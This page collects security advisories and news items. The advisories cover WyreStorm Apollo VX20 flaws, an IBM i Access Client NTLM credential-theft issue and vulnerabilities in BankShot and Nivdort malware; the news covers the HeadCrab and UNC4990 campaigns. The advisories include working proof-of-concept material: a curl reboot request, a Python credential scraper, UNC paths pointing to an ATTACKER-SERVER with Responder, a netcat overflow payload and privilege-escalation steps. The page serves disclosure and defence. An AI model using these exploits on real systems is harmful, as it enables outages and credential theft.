An issue was discovered on WyreStorm Apollo VX20 versions prior to 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec     [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Incorrect Access Control (DOS)[Affected Product Code Base]APOLLO VX20 < 1.3.58, fixed in v1.3.58[Affected Component]Web interface, reboot and reset commands[CVE Reference]CVE-2024-25736[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.[Exploit/POC]curl -k https://192.168.x.x/device/reboot[Network Access]Remote[Severity]High[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Incorrect Access Control

WyreStorm Apollo VX20 versions prior to 1.3.58 suffer from a cleartext credential disclosure vulnerability when accessing /device/config with an HTTP GET.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec     [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Incorrect Access Control (Credentials Disclosure)[Affected Component]Web interface, config[Affected Product Code Base] APOLLO VX20 < 1.3.58, fixed in v1.3.58[CVE Reference]CVE-2024-25735[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/configE.g. HTTP response snippet::{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"},"softAp":{"password":"12345678","router":"y","softAp":"y"}...[Exploit/POC]import requeststarget="https://x.x.x.x"res = requests.get(target+"/device/config", verify=False)idx=res.content.find('{"password":')if idx != -1:    idx2=res.content.find('router')    if idx2 != -1:        print("[+] CVE-2024-25735 Credentials Disclosure")        print("[+] " + res.content[idx + 1:idx2 + 11])        print("[+] hyp3rlinx")else:    print("[!] Apollo vX20 Device not vulnerable...")[Network Access]Remote[Severity]High[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Credential Disclosure

An issue was discovered on WyreStorm Apollo VX20 devices prior to version 1.3.58. The TELNET service prompts for a password only after a valid username is entered. Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts allowing for account discovery.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Account Enumeration[CVE Reference]CVE-2024-25734[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.[Exploit/POC]TELNET x.x.x.x 23username:aausername:bbusername:adminpassword:[Network Access]Remote [Affected Product Code Base] APOLLO VX20 - < 1.3.58, fixed in v1.3.58[Severity]Medium[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Account Enumeration

IBM i Access Client Solutions (ACS) versions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 suffer from a remote credential theft vulnerability.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

[Vendor]  
www.ibm.com

[Product]  
IBM i Access Client Solutions

[Versions]  
All

[Remediation/Fixes]  
None

[Vulnerability Type]  
Remote Credential Theft

[CVE Reference]  
CVE-2024-22318

[Security Issue]  
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.  
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.  
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.  
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.

[References]  
https://www.ibm.com/support/pages/node/7116091

[Exploit/POC]  
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]  
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:  
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]  
ID=WS  
Version=9  
[Telnet5250]  
AssociatedPrinterStartMinimized=N  
AssociatedPrinterTimeout=0  
SSLClientAuthentication=Y  
HostName=PWN  
AssociatedPrinterClose=N  
Security=CA400  
CertSelection=AUTOSELECT  
AutoReconnect=Y  
[KeepAlive]  
KeepAliveTimeOut=0  
[Keyboard]  
IBMDefaultKeyboard=N  
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c  
[Communication]  
Link=telnet5250

[Network Access]  
Remote

[Severity]  
Medium

[Disclosure Timeline]  
Vendor Notification:  December 14, 2023  
Vendor Addresses Issue: February 7, 2024  
February 8, 2024 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

IBM i Access Client Solutions Remote Credential Theft

Cybersecurity researchers have detailed an updated version of the malware HeadCrab that's known to target Redis database servers across the world since early September 2021.
The development, which comes exactly a year after the malware was first publicly disclosed by Aqua, is a sign that the financially-motivated threat actor behind the campaign is actively adapting and

Cybersecurity researchers have detailed an updated version of the malware **HeadCrab** that's known to target Redis database servers across the world since early September 2021.

The development, which comes exactly a year after the malware was first publicly disclosed by Aqua, is a sign that the financially-motivated threat actor behind the campaign is actively adapting and refining their tactics and techniques to stay ahead of the detection curve.

The cloud security firm said that "the campaign has almost doubled the number of infected Redis servers," with an additional 1,100 compromised servers, up from 1,200 reported at the start of 2023.

HeadCrab is designed to infiltrate internet-exposed Redis servers and wrangle them into a botnet for illicitly mining cryptocurrency, while also leveraging the access in a manner that allows the threat actor to execute shell commands, load fileless kernel modules, and exfiltrate data to a remote server.

While the origins of the threat actor are presently not known, they make it a point to note in a "mini blog" embedded into the malware that the mining activity is "legal in my country" and that they do it because "it almost doesn't harm human life and feelings (if done right)."

The operator, however, acknowledges that it's a "parasitic and inefficient way" of making money, adding their aim is to make $15,000 per year.

"An integral aspect of the sophistication of HeadCrab 2.0 lies in its advanced evasion techniques," Aqua researchers Asaf Eitani and Nitzan Yaakov said. "In contrast to its predecessor (named HeadCrab 1.0), this new version employs a fileless loader mechanism, demonstrating the attacker's commitment to stealth and persistence."

It's worth noting that the previous iteration utilized the SLAVEOF command to download and save the HeadCrab malware file to disk, thereby leaving artifact traces on the file system.

HeadCrab 2.0, on the other hand, receives the malware's content over the Redis communication channel and stores it in a fileless location in a bid to minimize the forensic trail and make it much more challenging to detect.

Also changed in the new variant is the use of the Redis MGET command for command-and-control (C2) communications for added covertness.

"By hooking into this standard command, the malware gains the ability to control it during specific attacker-initiated requests," the researchers said.

"Those requests are achieved by sending a special string as an argument to the MGET command. When this specific string is detected, the malware recognizes the command as originating from the attacker, triggering the malicious C2 communication."

Describing HeadCrab 2.0 as an escalation in the sophistication of Redis malware, Aqua said its ability to masquerade its malicious activities under the guise of legitimate commands poses new problems for detection.

"This evolution underscores the necessity for continuous research and development in security tools and practices," the researchers concluded. "The engagement by the attacker and the subsequent evolution of the malware highlights the critical need for vigilant monitoring and intelligence gathering."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

HeadCrab 2.0 Goes Fileless, Targeting Redis Servers for Crypto Mining

Trojan.Win32 BankShot malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/f2fd6a7b400782bb43499e722fb62cf4.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Trojan.Win32 BankShot  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 1978 and creates a local Windows service running with SYSTEM integrity. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH)  
Family: BankShot  
Type: PE32  
MD5: f2fd6a7b400782bb43499e722fb62cf4  
Vuln ID: MVID-2024-0669  
ASLR: Not Enabled  
DEP: Enabled  
SEH: Not Enabled  
CFG: Not Enabled  
Disclosure: 01/30/2024

Memory Dump:  
(16bc.cf8): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000  
eip=41414141 esp=061511f0 ebp=06151210 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???  
0:005> .ecxr  
eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000  
eip=41414141 esp=061511f0 ebp=06151210 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???  
0:005> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for MouseServer.exe  
*** ERROR: Module load completed but symbols could not be loaded for MouseServer.exe  
Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
MouseServer+2a95e  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

EXCEPTION_RECORD:  0624dec4 -- (.exr 0x624dec4)  
ExceptionAddress: 0042a95e (MouseServer+0x0002a95e)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 06250000  
Attempt to write to address 06250000

PROCESS_NAME:  MouseServer.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP:   
MouseServer+2a95e  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

FAILED_INSTRUCTION_ADDRESS:   
+2a95e  
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  0624df14 -- (.cxr 0x624df14)  
eax=027fce88 ebx=0624fbfc ecx=000008d8 edx=00001d00 esi=027fc5b0 edi=06250000  
eip=0042a95e esp=0624e374 ebp=0624fbf0 iopl=0         nv up ei pl nz na po cy  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203  
MouseServer+0x2a95e:  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]  
Resetting default scope

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 41414141 to 0042a95e

FRAME_ONE_INVALID: 1

STACK_TEXT:    
0624e374 0042a95e mouseserver+0x2a95e  
0624fbf8 41414141 unknown!printable+0x0

STACK_COMMAND:  .cxr 000000000624DF14 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 624e374 ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  mouseserver+2a95e

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: MouseServer

IMAGE_NAME:  MouseServer.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  58eb1b3a

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_MouseServer.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_mouseserver+2a95e

0:005> !exchain  
0624ddd4: ntdll!ExecuteHandler2+44 (77309d70)  
0624fbe4: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
C:\Users\gg\Desktop>python -c "print('A'*32000)" | nc64.exe x.x.x.x 1978  
system windows 6.2  
version 1.7.4.0  
serverid 7E8539FB-5E68-464F-AE62-129E95A7DFB8

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32 BankShot MVID-2024-0669 Buffer Overflow

A financially motivated threat actor known as UNC4990 is leveraging weaponized USB devices as an initial infection vector to target organizations in Italy.
Google-owned Mandiant said the attacks single out multiple industries, including health, transportation, construction, and logistics.
"UNC4990 operations generally involve widespread USB infection followed by the deployment of the

Cryptocurrency / Cybersecurity

A financially motivated threat actor known as **UNC4990** is leveraging weaponized USB devices as an initial infection vector to target organizations in Italy.

Google-owned Mandiant said the attacks single out multiple industries, including health, transportation, construction, and logistics.

"UNC4990 operations generally involve widespread USB infection followed by the deployment of the EMPTYSPACE downloader," the company said in a Tuesday report.

"During these operations, the cluster relies on third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded additional stages, which it downloads and decodes via PowerShell early in the execution chain."

UNC4990, active since late 2020, is assessed to be operating out of Italy based on the extensive use of Italian infrastructure for command-and-control (C2) purposes.

It's currently not known if UNC4990 functions only as an initial access facilitator for other actors. The end goal of the threat actor is not clear, although in one instance an open-source cryptocurrency miner is said to have been deployed after months of beaconing activity.

Details of the campaign were previously documented by Fortgale and Yoroi in early December 2023, with the former tracking the adversary under the name Nebula Broker.

The infection begins when a victim double-clicks on a malicious LNK shortcut file on a removable USB device, leading to the execution of a PowerShell script that's responsible for downloading EMPTYSPACE (aka BrokerLoader or Vetta Loader) from a remote server via another intermedia PowerShell script hosted on Vimeo.

Yoroi said it identified four different variants of EMPTYSPACE written in Golang, .NET, Node.js, and Python, which subsequently acts as a conduit for fetching next-stage payloads over HTTP from the C2 server, including a backdoor dubbed QUIETBOARD.

A notable aspect of this phase is the use of popular sites like Ars Technica, GitHub, GitLab, and Vimeo for hosting the malicious payload.

"The content hosted on these services posed no direct risk for the everyday users of these services, as the content hosted in isolation was completely benign," Mandiant researchers said. "Anyone who may have inadvertently clicked or viewed this content in the past was not at risk of being compromised."

QUIETBOARD, on the other hand, is a Python-based backdoor with a wide range of features that allow it to execute arbitrary commands, alter crypto wallet addresses copied to clipboard to redirect fund transfers to wallets under their control, propagate the malware to removable drives, take screenshots, and gather system information.

Additionally, the backdoor is capable of modular expansion and running independent Python modules like coin miners as well as dynamically fetching and executing Python code from the C2 server.

"The analysis of both EMPTYSPACE and QUIETBOARD suggests how the threat actors took a modular approach in developing their toolset," Mandiant said.

"The use of multiple programming languages to create different versions of the EMPTYSPACE downloader and the URL change when the Vimeo video was taken down show a predisposition for experimentation and adaptability on the threat actors' side."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Italian Businesses Hit by Weaponized USBs Spreading Cryptojacking Malware

Debian Linux Security Advisory 5610-1 - Multiple security issues were discovered in Redis, a persistent key-value database, which could result in the execution of arbitrary code or ACL bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5610-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 29, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : redisCVE ID         : CVE-2022-24834 CVE-2023-36824 CVE-2023-41053                 CVE-2023-41056 CVE-2023-45145Multiple security issues were discovered in Redis, a persistentkey-value database, which could result in the execution of arbitrarycode or ACL bypass.For the stable distribution (bookworm), these problems have been fixed inversion 5:7.0.15-1~deb12u1.We recommend that you upgrade your redis packages.For the detailed security status of redis please refer toits security tracker page at:https://security-tracker.debian.org/tracker/redisFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW4FTMACgkQEMKTtsN8TjZJvBAAhC0xNfda1GVgbCT3iTVM6qoD5UD+ZzXbpvvn2FKApdD4prQdJyC4FHGvKX8V14qgqPb51nh9quOAmP07J6dCYlc8zesAq3VuffkspetRBw5NGfnlixgB7QXQ0/QTinQf7ErInV1BdfJVWPJ0PAxIVj3SkkiE+TysY5xkTijn+KcnnAKsbTiUYvwAAh8q27XYI4w5YWdSh87cA/hL5lfmWyzefPnp7rIrk/nHvkYs54/Rs6PuJaJ3tv4OQ3lfOotxvSzWKaNAQRlzPbgZsdl+HRTvmZUALDnZEr4ETD0T+lvkjU+srI7mndUmk9LvSxzcoUetQZEZLq/764jGurNysfxmHmiAEflzj1BC9OpDh4mm7bYFpFqqGZ9RP7Mvsh5Qae6lyWdqwhiumr60fjdzHYj/6ckeUDlnHgbOVHoultnMTQ8Px6GuWoEmK4JIrKZVjIS2FQ7V8sIBu38sGx+054RJeMqR6iO5bHzulwRJ0bIE8gh/47ElfszifMoZtFPnjW/PA0YnyWfWLWVLYwrwaIa7oP27atuz1LQX6reUO1t0zdwZN1YedU8pUxLHBYyozjQIVbV94QnPETRd6QQoNdtKdFcTrINYgQRiyvcjJGqaQ4VwL0Cw9tprDvFCM9x/OWVwT6ZTspYPWJ6qjBB9x8e9GBG2w0wSC1yeAc0zDoU==IDW1-----END PGP SIGNATURE-----

Debian Security Advisory 5610-1

TrojanSpy Win32 Nivdort malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy Win32 NivdortVulnerability: Insecure Permissions - EoP (SYSTEM) Family: NivdortType: PE32MD5: 15bda00b57e2ed729a45f7cfa62165daVuln ID: MVID-2024-0668Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exeDisclosure: 01/20/2024Description:The malware creates a service which runs as SYSTEM and grants change (C) permissions to the authenticated user group on its installation directory. Standard low integrity users can still rename the service executable while it is running, replace the PE file with their own and restart the infected system to start the service.C:\>cacls C:\pewcvmnvyr\jwgaklb.exeC:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F                          NT AUTHORITY\SYSTEM:(ID)F                          BUILTIN\Users:(ID)R                          NT AUTHORITY\Authenticated Users:(ID)CC:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 0   IGNORE        BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Group Key KtmRm Coordinator Registry TPM Bus        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemExploit/PoC:Open a cmd prompt as standard user:1) unhide the service binary   C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe2) rename the service binaryC:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED3) optional replace with your own binary and escalate to SYSTEMC:\Users\norgt>dir \pewcvmnvyr\ Directory of C:\pewcvmnvyr        ..01/14/2024  02:05 AM                 0 dqrpgvnkh01/14/2024  02:05 AM                 6 egjrdhynfm01/14/2024  02:09 AM                 4 nhefhloix01/14/2024  02:05 AM           332,800 PWNED   <================= DONE01/14/2024  02:05 AM           332,800 rvoyf9njtqg4zejno.exeDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy Win32 Nivdort MVID-2024-0668 Insecure Permissions

Redis raft versions master-1b8bd86 to master-7b46079 were discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c.

    [Suggested description]Redis raft master-1b8bd86 to master-7b46079 was discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c.[VulnerabilityType Other]AddressSanitizer: odr-violation[Vendor of Product]Redis[Affected Product Code Base]raft - master-1b8bd86 to master-7b46079[Affected Component]affected executable[Attack Type]Remote[Impact Code execution]true[Impact Denial of Service]true[Attack Vectors]run redis with redisraft[Reference]https://github.com/RedisLabs/redisraft/issues/600[Has vendor confirmed or acknowledged the vulnerability?]true[Discoverer]jerrytesting

Tag

#redis